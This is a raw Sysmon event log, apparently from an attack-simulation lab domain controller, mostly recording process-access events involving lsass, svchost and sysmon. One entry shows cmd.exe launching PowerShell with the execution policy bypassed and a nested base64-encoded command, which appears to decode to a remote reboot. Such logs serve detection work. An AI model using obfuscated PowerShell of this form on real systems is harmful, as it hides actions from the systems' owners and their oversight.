12:00:02.357{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000722Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.357{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000721Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.357{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000720Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.357{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000719Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.357{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000718Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.357{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000717Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.357{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000716Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.357{266CAFBE-62C8-6064-0500-00000000AD01}6201152C:\Windows\system32\csrss.exe{266CAFBE-6442-6064-E202-00000000AD01}4640C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000715Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.357{266CAFBE-6441-6064-DD02-00000000AD01}51164316C:\Windows\system32\WinrsHost.exe{266CAFBE-6442-6064-E202-00000000AD01}4640C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x8000000000000000714Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.358{266CAFBE-6442-6064-E202-00000000AD01}4640C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 
UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAVQB3AEIAbABBAEgAUQBBAEwAUQBCAFQAQQBIAFEAQQBjAGcAQgBwAEEARwBNAEEAZABBAEIATgBBAEcAOABBAFoAQQBCAGwAQQBDAEEAQQBMAFEAQgBXAEEARwBVAEEAYwBnAEIAegBBAEcAawBBAGIAdwBCAHUAQQBDAEEAQQBUAEEAQgBoAEEASABRAEEAWgBRAEIAegBBAEgAUQBBAEMAZwBCAHoAQQBHAGcAQQBkAFEAQgAwAEEARwBRAEEAYgB3AEIAMwBBAEcANABBAEkAQQBBAHYAQQBIAEkAQQBJAEEAQQB2AEEASABRAEEASQBBAEEAeQBBAEMAQQBBAEwAdwBCAGoAQQBDAEEAQQBJAGcAQgBTAEEARwBVAEEAWQBnAEIAdgBBAEcAOABBAGQAQQBBAGcAQQBHAGsAQQBiAGcAQgBwAEEASABRAEEAYQBRAEIAaABBAEgAUQBBAFoAUQBCAGsAQQBDAEEAQQBZAGcAQgA1AEEAQwBBAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBpAEEAQQBvAEEAUwBRAEIAbQBBAEMAQQBBAEsAQQBBAHQAQQBHADQAQQBiAHcAQgAwAEEAQwBBAEEASgBBAEEALwBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBTAFEAQgBtAEEAQwBBAEEASwBBAEIASABBAEcAVQBBAGQAQQBBAHQAQQBGAFkAQQBZAFEAQgB5AEEARwBrAEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAGcAQQBFAHcAQQBRAFEAQgBUAEEARgBRAEEAUgBRAEIAWQBBAEUAawBBAFYAQQBCAEQAQQBFADgAQQBSAEEAQgBGAEEAQwBBAEEATABRAEIARgBBAEgASQBBAGMAZwBCAHYAQQBIAEkAQQBRAFEAQgBqAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEkAQQBCAFQAQQBHAGsAQQBiAEEAQgBsAEEARwA0AEEAZABBAEIAcwBBAEgAawBBAFEAdwBCAHYAQQBHADQAQQBkAEEAQgBwAEEARwA0AEEAZABRAEIAbABBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBaAFEAQgA0AEEARwBrAEEAZABBAEEAZwBBAEMAUQBBAFQAQQBCAEIAQQBGAE0AQQBWAEEAQgBGAEEARgBnAEEAUwBRAEIAVQBBAEUATQBBAFQAdwBCAEUAQQBFAFUAQQBJAEEAQgA5AEEAQwBBAEEAUgBRAEIAcwBBAEgATQBBAFoAUQBBAGcAQQBIAHMAQQBJAEEAQgBsAEEASABnAEEAYQBRAEIAMABBAEMAQQBBAE0AUQBBAGcAQQBIADAAQQBJAEEAQgA5AEEAQQA9AD0AC:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6441-6064-D466-120000000000}0x1266d40HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-6441-6064-DD02-00000000AD01}5116C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 
10341000x8000000000000000713Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.342{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000712Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.342{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000711Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.342{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x8000000000000000710Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.326{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000709Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.326{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000708Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.326{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
23542300x8000000000000000707Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.232{266CAFBE-6441-6064-E002-00000000AD01}4648ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000706Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.185{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-62DA-6064-0B00-00000000AD01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000705Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.185{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-62DA-6064-0B00-00000000AD01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000704Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.185{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1000-00000000AD01}1144C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000703Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.170{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000702Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.170{266CAFBE-62C8-6064-0500-00000000AD01}620636C:\Windows\system32\csrss.exe{266CAFBE-6442-6064-E102-00000000AD01}2744C:\Windows\System32\wsqmcons.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000701Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.170{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000700Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 